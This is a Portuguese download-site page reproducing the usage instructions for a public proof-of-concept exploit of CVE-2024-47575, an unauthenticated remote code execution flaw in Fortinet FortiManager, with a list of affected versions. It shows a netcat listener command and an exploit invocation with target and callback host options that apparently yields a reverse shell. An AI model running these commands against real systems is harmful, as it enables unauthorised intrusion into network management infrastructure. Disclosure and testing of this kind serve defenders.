Página Inicial>Relacionado com a programação>Outro código-fonte
Baixar

CVE-2024-47575

Fortinet FortiManager Execução remota de código não autenticado, também conhecido como FortiJump CVE-2024-47575

Veja nossa postagem no blog para obter detalhes técnicos

Para começar, estabeleça sua sessão ncat: 

 nc -lvvnp 80

Em seguida, execute nosso gerador de artefato de detecção: 

 python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit

Para verificar a vulnerabilidade sozinho, use as seguintes opções: 

 python3 CVE-2024-47575.py --target 192.168.1.110 --action check

Versões afetadas 

 FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4

Explorar autores

Esta exploração foi escrita por Sina Kheirkhah (@SinSinology) do watchTowr (@watchtowrcyber)

Siga o watchTowr Labs

Para as pesquisas de segurança mais recentes, siga a equipe do watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Expandir
Informações adicionais
Aplicativos Relacionados
Recomendado para você
Informações Relacionadas Todos